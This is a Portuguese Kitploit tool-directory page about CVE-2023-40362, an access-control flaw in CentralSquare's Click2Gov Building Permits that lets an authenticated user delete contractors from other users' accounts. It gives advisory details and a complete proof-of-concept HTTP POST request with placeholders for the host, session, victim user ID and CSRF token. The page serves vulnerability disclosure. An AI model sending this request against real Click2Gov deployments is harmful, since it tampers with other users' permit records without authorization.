Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ally-petitt/cve-2023-40362
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubally-petitt/cve-2023-40362

CVE-2023-40362

CVE-2023-40362: detalhes da vulnerabilidade e prova de conceito

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-40362

CVE-2023-40362 detalhes da vulnerabilidade e prova de conceito.

Visão Geral

Uma vulnerabilidade de controle de acesso no Click2Gov BP na URI /Click2GovBP/mastercontractorlist.html permite que usuários autenticados excluam os empreiteiros das contas de outros usuários com o ID de usuário da vítima e as informações do empreiteiro a ser excluído.

Isso é causado pela falha do aplicativo web em verificar se o usuário está autorizado a excluir o empreiteiro da conta cujo ID de usuário é especificado.

Fornecedor: CentralSquare

Reportado por: Ally Petitt

Descoberto: 13 de junho de 2023

Produtos Afetados: Click2Gov Building Permits (BP)

Versões Afetadas: Antes de outubro de 2023

CVSS v3: 5.4 - Moderada (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)

Prova de Conceito (PoC)

A solicitação HTTP POST mostrada abaixo pode ser feita para excluir um empreiteiro da conta de uma vítima. O token CSRF deve ser válido para que isso funcione.

root@kitploit:~
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>
Baixar ferramenta